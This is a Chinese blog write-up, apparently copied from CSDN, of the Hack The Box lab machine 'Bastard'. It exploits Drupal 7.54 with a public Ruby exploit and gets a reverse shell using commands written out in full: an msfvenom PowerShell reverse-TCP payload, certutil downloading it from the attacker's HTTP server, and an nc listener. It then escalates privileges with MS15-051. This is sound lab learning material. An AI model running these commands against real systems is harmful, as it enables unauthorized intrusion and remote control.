码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【Hack The Box】windows练习-- Bastard


    HTB 学习笔记

    【Hack The Box】windows练习-- Bastard


    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年10月29日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    文章目录

    • HTB 学习笔记
      • 信息收集
      • 反弹shell

    信息收集

    在这里插入图片描述
    发现了一些敏感的文件,打开发现了cms的版本信息
    在这里插入图片描述于是进行谷歌搜索:drupal 7.54 exp

    先安装必要环境
    sudo gem install highline
    
    然后,运行漏洞利用:
    
    ruby 44449.rb http://10.10.10.9
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6

    在这里插入图片描述这是用法解释
    在这里插入图片描述
    而后得到了一个不稳定的shell

    在这里插入图片描述
    可以看到获取不到systeminfo的补丁信息,说明我们挑一个对应系统的内核漏洞提权即可

    反弹shell

    msfvenom -p windows/x64/powershell_reverse_tcp LHOST=kali-vpn-ip LPORT=kali-tcp-port -a x64 --platform windows -e x64/xor_dynamic -b '\x00' -f exe -o shell.exe
    sudo python3 -m http.server 80
    certutil.exe -urlcache -split -f http://kali-vpn-ip/shell.exe C:\Windows\Temp\shell.exe
    sudo nc -lnvp <kali-tcp-port>
    cmd.exe /c C:\Windows\Temp\shell.exe
    
    • 1
    • 2
    • 3
    • 4
    • 5

    在这里插入图片描述

    但是不能正常运行winpeas
    所以
    
    • 1
    • 2

    在这里插入图片描述

    在这里我却无法使用winpeas来进行枚举
    但是由于没有任何的补丁,所以这个系统的内核是非常不安全的,
    
    • 1
    • 2

    在这里插入图片描述
    所以我选择了ms15-051
    传上去利用即可

    利用这个靶场我进行了许多漏洞枚举的尝试,但是基本都失败了,原因是net版本太低无法使用winpeas,以及许多其他的问题
    我将再次尝试

  • 相关阅读:
    第十五届蓝桥杯题解-好数
    从0实现线性回归
    Apipost连接数据库详解
    计算机基础知识47
    9月7日扒面经
    C++字符串类 - std::string - 常用总结
    【网络层介绍】
    Llama2-Chinese项目:2.3-预训练使用QA还是Text数据集?
    玩转全球最大同性交友网站--- 开源社区GitHub
    Ansible stat模块 stat模块 – 检索文件或文件系统状态
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127584544
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号